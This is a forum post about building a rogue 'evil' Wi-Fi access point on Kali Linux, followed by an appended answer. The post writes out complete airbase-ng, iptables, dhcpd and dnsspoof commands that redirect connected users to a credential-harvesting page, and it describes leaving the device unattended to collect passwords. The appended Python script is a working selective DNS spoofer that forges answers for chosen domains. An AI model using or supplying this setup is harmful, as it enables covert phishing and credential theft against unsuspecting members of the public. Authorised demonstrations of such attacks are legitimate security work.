Post Thu Aug 25, 2016 3:33 pm

DNS issues with evil access point

Hello, I am having some trouble creating an evil access point for a security demonstration, specifically some DNS issues.

Essentially what I am doing is broadcasting a fake wireless access point, bridging the connection to my ethernet to allow regular internet access, and spoofing the DNS for certain websites, redirecting the user to my own credential harvesting page.

I am attempting to do all this through the CLI as a proof of concept for constructing a portable evil access point that can basically be dumped somewhere, left to harvest credentials and then collected at a later point and the harvested data dumped to a computer.

Here is an overview of the scripts I have built to perform this kind of attack:

Interfaces
==========
wlan0 (access point with gateway 192.168.0.1)
eth0 (ethernet with internet access, gateway 192.168.1.1)
at0 (bridged network interface created by airbase-ng)

The following commands are executed in sequence:
  Code:

# Start services and monitor mode
service apache2 start
airmon-ng start wlan0
airmon-ng check kill

# Start access point
airbase-ng -c 11 -e "Wifi_Gratis" wlan0mon

# Bring up the bridge, setup the route and run the dhcp server with custom config
ifconfig at0 up &&
ifconfig at0 192.168.0.1 netmask 255.255.255.0 &&
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1 &&
dhcpd at0   # serve leases only on the AP side

# Enable IP forwarding (no trailing && here: the next line is a comment)
echo 1 > /proc/sys/net/ipv4/ip_forward

# Configure the ip tables
# Only DNS (udp/53) goes to the upstream resolver; matching all UDP also rewrites DHCP and everything else
iptables -t nat -A PREROUTING -i at0 -p udp --dport 53 -j DNAT --to 192.168.1.1 ##gateway on eth0
# Clients use 192.168.0.x addresses, so replies from eth0's side need source NAT back to us
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -i at0 -p tcp --destination-port 80 -j REDIRECT --to-port 8000

# Execute DNS spoofing attack on at0 bridged interface
dnsspoof -i at0 -f /root/RogueAP/dnshosts


And here is the config I have written for the dhcp server
  Code:
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.0.0 netmask 255.255.255.0 {
   option routers 192.168.0.1;
   option subnet-mask 255.255.255.0;
   option domain-name-servers 192.168.0.1;
   range 192.168.0.2 192.168.0.40;
}


Now, on to the problem.

Say I connect to the rogue access point with an iPhone. It connects fine and has access to the internet, but it can only resolve the IP addresses of websites it has visited previously, meaning it cannot perform a DNS lookup for a real website, only for websites where the DNS record has been cached on the device.

Will I need to enable my own full DNS or is there a way to route DNS queries directly to the service provider on eth0?

I am running the latest 64-bit version of Kali, installed on a notebook with a Windows 7 dual-boot and an ath9k chipset wireless card.
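The question at the end of the post (run a full DNS server, or just route queries to the provider's resolver) has a middle option that does not depend on dnsspoof winning a race against the real reply: a small selective forwarder that listens on the AP address handed out by DHCP, forges A records only for the names you want to harvest, and relays every other query unchanged to the upstream resolver on the eth0 side. The following is an added example, not code from the original post or from the dnsspoof/airbase-ng tools; the spoofed name `login.example.com`, the 60-second TTL and the query ID in the test input are constructed for illustration, while 192.168.0.1 and 192.168.1.1 are the addresses from the post. With this in place the UDP DNAT rule is no longer needed, but forwarded queries still leave with 192.168.0.x source addresses, so NAT on eth0 (a MASQUERADE rule) remains necessary for the upstream replies to come back.

```python
import socket
import struct

# Constructed spoof map: queried name -> address of the harvesting page.
SPOOF = {"login.example.com": "192.168.0.1"}
UPSTREAM = ("192.168.1.1", 53)   # resolver reachable through eth0 (address from the post)
LISTEN = ("192.168.0.1", 53)     # AP-side address that DHCP hands out as the DNS server


def parse_question(msg):
    """Return (qname, qtype, qclass, end_offset) for the first question in a DNS message."""
    if len(msg) < 12:
        raise ValueError("short DNS header")
    qdcount = struct.unpack("!H", msg[4:6])[0]
    if qdcount < 1:
        raise ValueError("message carries no question")
    labels, off = [], 12
    while True:
        if off >= len(msg):
            raise ValueError("truncated name")
        ln = msg[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:  # compression pointers never appear in a query's question name
            raise ValueError("unexpected compression pointer in question")
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    if off + 4 > len(msg):
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return ".".join(labels).lower(), qtype, qclass, off + 4


def build_spoofed_response(query, spoof_map, ttl=60):
    """Return a forged A-record reply if the name is in spoof_map, otherwise None (forward it)."""
    qname, qtype, qclass, qend = parse_question(query)
    if qtype != 1 or qclass != 1 or qname not in spoof_map:
        return None
    # Same transaction ID; flags 0x8180 = response, recursion desired + available, NOERROR.
    header = query[:2] + struct.pack("!HHHHH", 0x8180, 1, 1, 0, 0)
    question = query[12:qend]  # echo the question section verbatim
    rdata = socket.inet_aton(spoof_map[qname])
    # 0xC00C is a pointer to the name at offset 12 (the question), then TYPE A, CLASS IN, TTL, RDLENGTH.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def build_query(name, qid=0x1234):
    """Build a plain recursive A query; used here to construct test input."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)


def serve(listen=LISTEN, upstream=UPSTREAM, spoof_map=SPOOF):
    """Answer spoofed names locally; relay everything else to the upstream resolver."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(listen)
    while True:
        query, client = sock.recvfrom(512)
        try:
            reply = build_spoofed_response(query, spoof_map)
        except ValueError:
            continue  # malformed query: drop it rather than forward garbage
        if reply is None:
            up = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            up.settimeout(3)
            try:
                up.sendto(query, upstream)
                reply, _ = up.recvfrom(4096)
            except socket.timeout:
                continue  # upstream silent: the client will retry on its own
            finally:
                up.close()
        sock.sendto(reply, client)


if __name__ == "__main__":
    serve()  # needs root to bind port 53 on the AP interface
```

Run it in place of dnsspoof once at0 has its address; because it is the resolver the phone was told to use, uncached names resolve through the upstream path while the listed names get the forged answer every time, without depending on packet timing.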